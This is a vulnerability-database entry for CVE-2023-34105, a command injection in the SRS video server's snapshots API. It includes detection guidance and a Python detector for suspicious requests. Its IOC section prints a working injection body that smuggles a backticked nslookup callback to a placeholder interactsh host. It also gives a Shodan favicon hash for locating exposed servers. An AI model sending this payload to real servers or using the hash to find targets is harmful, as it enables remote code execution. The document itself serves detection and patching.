cbcvebase.
CVE-2023-34105
published 2023-06-12


Priority: P181 high
CVSS 3.1: 7.5 (AV:N / AC:H / PR:N / UI:R / S:U / C:H / I:H / A:H)
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 8.76% (94.5th percentile)

SRS is a real-time video server supporting RTMP, WebRTC, HLS, HTTP-FLV, SRT, MPEG-DASH, and GB28181. Prior to versions 5.0.157, 5.0-b1, and 6.0.48, SRS's `api-server` server is vulnerable to a drive-by command injection. An attacker may send a request to the `/api/v1/snapshots` endpoint containing any commands to be executed as part of the body of the POST request. This issue may lead to Remote Code Execution (RCE). Versions 5.0.157, 5.0-b1, and 6.0.48 contain a fix.

Affected

5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ossrs | simple_realtime_server | >= 5.0.137 < 5.0.157 | 5.0.157 |
| ossrs | simple_realtime_server | >= 6.0.18 < 6.0.48 | 6.0.48 |
| ossrs | srs | < 5.0-b1 | 5.0-b1 |
| ossrs | srs | | |
| ossrs | srs | | |

Detection & IOCs (extracted from sources)

url: /api/v1/snapshots
command: {"action": "on_publish", "app": "`nslookup {{interactsh-url}}`", "stream":"foo", "vhost": "foo", "client_id":"foo"}
  • Look for POST requests to /api/v1/snapshots with a JSON body containing backtick-wrapped shell commands in the 'app' parameter — this is the injection vector for CVE-2023-34105.
  • The injection occurs specifically in the 'app' parameter of the snapshots API JSON body; monitor for shell metacharacters (backticks, $(), pipes, semicolons) in that field.
  • Use the Shodan favicon hash 1386054408 to identify exposed SRS api-server instances on the internet for proactive asset discovery.
  • Successful exploitation produces an HTTP 200 response with a JSON body containing both '"code":' and 'data":' fields; correlate with outbound DNS from the server to detect OOB command execution.
  • Affected versions are v5.0.137–v5.0.156 and v6.0.18–v6.0.47; flag SRS instances in these version ranges as high-priority targets.
  • The vulnerability requires user interaction (UI:R in CVSS) despite being unauthenticated; exploitation is a drive-by scenario, meaning a victim must trigger the request (e.g., via SSRF or a crafted link), not a fully autonomous server-side attack.
  • The vulnerable code path is in the api-server component (server.go L761), which may be a separate process/port from the main SRS media server; ensure detection coverage targets the api-server's HTTP listener specifically.
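
The first two detection notes above, as an added example that is not taken from the sources or from the SRS project: a check over captured HTTP requests that flags POSTs to /api/v1/snapshots whose JSON 'app' field contains the metacharacters listed. The function names, the record layout and the sample requests are constructed for illustration.

```python
import json
import re
from urllib.parse import urlsplit

SNAPSHOT_PATH = "/api/v1/snapshots"
# Metacharacters named in the guidance: backticks, $(), pipes, semicolons.
SHELL_META = re.compile(r"[`|;]|\$\(")


def check_request(method, target, body):
    """Return a finding string for a suspicious request, else None."""
    if method.upper() != "POST":
        return None
    # Compare the path only, so a query string does not hide the endpoint.
    if urlsplit(target).path.rstrip("/") != SNAPSHOT_PATH:
        return None
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return None  # not JSON: outside the pattern this check covers
    app = doc.get("app") if isinstance(doc, dict) else None
    if not isinstance(app, str):
        return None
    hit = SHELL_META.search(app)
    return f"shell metacharacter {hit.group()!r} in 'app'" if hit else None


def scan(records):
    """records: iterable of (method, target, body). Returns [(index, finding)]."""
    findings = []
    for i, (method, target, body) in enumerate(records):
        finding = check_request(method, target, body)
        if finding:
            findings.append((i, finding))
    return findings


# Constructed sample traffic (not real captures); payloads are inert placeholders.
SAMPLE = [
    ("POST", "/api/v1/snapshots", '{"action":"on_publish","app":"live","stream":"cam1"}'),
    ("POST", "/api/v1/snapshots", '{"action":"on_publish","app":"`placeholder`","stream":"foo"}'),
    ("POST", "/api/v1/snapshots?x=1", '{"action":"on_publish","app":"live$(placeholder)"}'),
    ("GET", "/api/v1/snapshots", ""),
    ("POST", "/api/v1/streams", '{"app":"`placeholder`"}'),
    ("POST", "/api/v1/snapshots", "not json"),
]

if __name__ == "__main__":
    for index, finding in scan(SAMPLE):
        print(index, finding)
```

A hit here says only that the request matches the injection pattern; correlating with outbound DNS from the api-server host, as noted above, is what indicates the command ran.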

CVSS provenance

nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
vulncheck | 7.5 | HIGH